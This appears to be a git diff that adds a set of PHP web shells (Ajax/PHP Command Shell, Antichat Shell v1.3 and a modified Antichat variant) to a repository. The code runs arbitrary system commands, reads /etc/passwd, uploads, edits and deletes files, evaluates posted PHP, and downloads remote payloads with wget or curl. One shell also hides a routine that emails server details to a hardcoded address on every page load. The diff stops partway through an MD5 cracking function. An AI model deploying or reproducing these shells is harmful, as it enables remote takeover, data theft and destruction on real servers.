+print 'Ajax/PHP Command Shell
+© By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+Custom Functions
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "
";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.
";
+			if(function_exists(passthru))
+			{
+				print "Passthru: Enabled
";
+			}
+			else
+			{
+				print "Passthru: Disabled
";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: Enabled
";
+			}
+			else
+			{
+				print "Exec: Disabled
";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: Enabled
";
+			}
+			else
+			{
+				print "System: Disabled
";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: Enabled
";
+			}
+			else
+			{
+				print "Shell_exec: Disabled
";
+			}
+		print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a 
reason why the commands aren't executed, this is probally it.
";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: Enabled";
+		}
+			else
+		{
+			print "Safe Mode: Disabled";
+		}
+		print "

Open_basedir will block access to some files you shouldn't access.
";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: Enabled";
+			}
+			else
+			{
+				print "Open_basedir: Disabled";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."
";
+			print "
Copyright AK-74 Security Team 2005 - '.date("Y").'
";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "
DirectoriesFiles
";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "[D][W]".$directory."
";
+			   }
+			   
+			   print "		";
+			   
+			   foreach($filez as $file)
+			   {
+				print "[D]".$file."
";
+			   }
+			   
+			   print "
";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by Ironfist.
Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "Free: $free / $total MB
Current path: $path
Uname -a Output:
";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."
";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+
+Command Shell ~ <?php print getenv("HTTP_HOST"); ?>
+
+
+
+
+
+
+
+
+

+
+


+
Quick Commands

+
+

+ $execute)
+{
+print ' 
';
+}
+?>
+
+

+
+
+

+
Command history

+

+

+
About

+

+

+Ajax/PHP Command Shell
by Ironfist
+

+Version 
+
+

+

+
+
Thanks to everyone @ 
+SharePlaza
+

+milw0rm
+

+and special greetings to everyone in rootshell
+

+
+		
+
+
+
+
+

+[Execute command] 
+[Upload file] 
+[Change directory] 
+[Filebrowser] 
+[Create File] 
+
+

+
+

+

+   

+Command: 

+

+

+

+

+
+
+
+
+    
+    
+    
+  
+    
+    
+    

+
You are not logged in, please login.
Password:
+
";
+}
+?>  
\ No newline at end of file
diff --git a/php/Ajax_PHP_Command_Shell.php b/php/Ajax_PHP_Command_Shell.php
new file mode 100644
index 0000000..0ba9308
--- /dev/null
+++ b/php/Ajax_PHP_Command_Shell.php
@@ -0,0 +1,646 @@
+ 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "".get_current_user()."~# ". htmlspecialchars($cmd)."
";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '
Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "
I can write to this directory";
+			}
+			else
+			{
+				print "
I can't write to this directory, please choose another one.";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print 'Ajax/PHP Command Shell
+© By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+Custom Functions
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "

";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.
";
+			if(function_exists(passthru))
+			{
+				print "Passthru: Enabled
";
+			}
+			else
+			{
+				print "Passthru: Disabled
";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: Enabled
";
+			}
+			else
+			{
+				print "Exec: Disabled
";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: Enabled
";
+			}
+			else
+			{
+				print "System: Disabled
";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: Enabled
";
+			}
+			else
+			{
+				print "Shell_exec: Disabled
";
+			}
+		print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a 
reason why the commands aren't executed, this is probally it.
";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: Enabled";
+		}
+			else
+		{
+			print "Safe Mode: Disabled";
+		}
+		print "

Open_basedir will block access to some files you shouldn't access.
";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: Enabled";
+			}
+			else
+			{
+				print "Open_basedir: Disabled";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."
";
+			print "";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "
DirectoriesFiles
";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "[D][W]".$directory."
";
+			   }
+			   
+			   print "		";
+			   
+			   foreach($filez as $file)
+			   {
+				print "[D]".$file."
";
+			   }
+			   
+			   print "
";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by Ironfist.
Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "Free: $free / $total MB
Current path: $path
Uname -a Output:
";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."
";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+
+Command Shell ~ <?php print getenv("HTTP_HOST"); ?>
+
+
+
+
+
+
+
+
+

+
+


+
Quick Commands

+
+

+ $execute)
+{
+print ' 
';
+}
+?>
+
+

+
+
+

+
Command history

+

+

+
About

+

+

+Ajax/PHP Command Shell
by Ironfist
+

+Version 
+
+

+

+
+
Thanks to everyone @ 
+SharePlaza
+

+milw0rm
+

+and special greetings to everyone in rootshell
+

+
+		
+
+
+
+
+

+[Execute command] 
+[Upload file] 
+[Change directory] 
+[Filebrowser] 
+[Create File] 
+
+

+
+

+

+   

+Command: 

+

+

+

+

+
+
+
+

+
You are not logged in, please login.
Password:
+
";
+}
+?>  
diff --git a/php/Antichat Shell v1.3.php b/php/Antichat Shell v1.3.php
new file mode 100644
index 0000000..72ea5cb
--- /dev/null
+++ b/php/Antichat Shell v1.3.php	
@@ -0,0 +1,180 @@
+BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}';
+$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.'';
+$footer='';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '
Login:
Password:
';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+ 
+

+
+
+
+
+
+
| Shell | Viewer| Editor| EXIT |


+

+
+
+
+

+
+

+
+
+
+

+

+";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "";
+echo "";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "";
+}
+echo "
+";
+for($i=0;$i';  
+  }
+for($i=0;$i
+
+'; 
+}
+echo "
Open directory:
Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo ' '.chr($j).'';
+ echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).'
+D
+E
";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "

+
+
+

+
";
+}
+//end editors
+?>
+
COPYRIGHT BY ANTICHAT.RU 

+
diff --git a/php/Antichat Shell. Modified by Go0o$E.php b/php/Antichat Shell. Modified by Go0o$E.php
new file mode 100644
index 0000000..af4c7d7
--- /dev/null
+++ b/php/Antichat Shell. Modified by Go0o$E.php	
@@ -0,0 +1,693 @@
+$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF");
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='';
+$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.'';
+$footer='';
+$lang=array(
+'filext'=>'File already exists.',
+'uploadok'=>'File was successfully uploaded.',
+'dircrt'=>'Dir is created.',
+'dontlist'=>'Listing dir permission denide.',
+'dircrterr'=>'Don\'t create dir.',
+'dirnf'=>'Dir not found.',
+'filenf'=>'File not found.',
+'dontwrdir'=>'Only read current dir.',
+'empty'=>'Directory not empty or access denide.',
+'deletefileok'=>'File deleted.',
+'deletedirok'=>'Dir deleted.',
+'isdontfile'=>'Selected file this is link.',
+'cantrfile'=>'Cant read file, permission denide.',
+'onlyracc'=>'Don\'t edit, only read access.',
+'workdir'=>'Work directory: ',
+'fullacc'=>'Full access.',
+'fullaccdir'=>'Full accees you are can create and delete dir.',
+'thisnodir'=>'This is don\'t dir.',
+'allfuncsh'=>'All function for work shell was disabled.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']." Click here for back in viewer";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']." Click here for back in viewer";
+else $content.=$lang['deletedirok']." Click here for back in viewer";
+}
+//shell
+if($action=="shell"){
+$content.="

+
+

+

+
";}
+//editor  
+if($action=="editor"){
+  $stdata.="

+  
+  
+  Open file:>\">
";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="

+
+File name:

+
+
";
+}
+if($test>2){
+$content.="

+
+
+

+
";
+}}
+//viewer
+if($action=="viewer"){
+$content.="";
+$content.="";
+		 }
+		$content.="";
+		for($i=0;$i'.$dire[$i].'';  
+		}
+		for($i=0;$i'.$files[$i].'
'; 
+		}
+		$content.="

Open directory:  >\">
";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="
Select drive:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.=' '.chr($j).'';
+		   $content.="
Name dirs and filestypesizepermissionoptions
dir'.perms($link).'X
file'.view_size(filesize($linkfile)).''.perms($linkfile).'DEX
";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="

+ 
+ 
+ <?php

+ 

+ ?>

+ 
";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="
+  ";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//Brute
+if($action=="brute"){
+
+function Brute() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+ignore_user_abort(1);
+}
+if($chars_de==""){$chars_de="";}
+$content="
  
+  Upload to dir: 
New file name: 
 
File addres:
+

+
+
+
+
+";
+
+if($_POST[pass_de]){  
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+}
+{
+crack_md5();
+}
+}
+function crack_md5() {
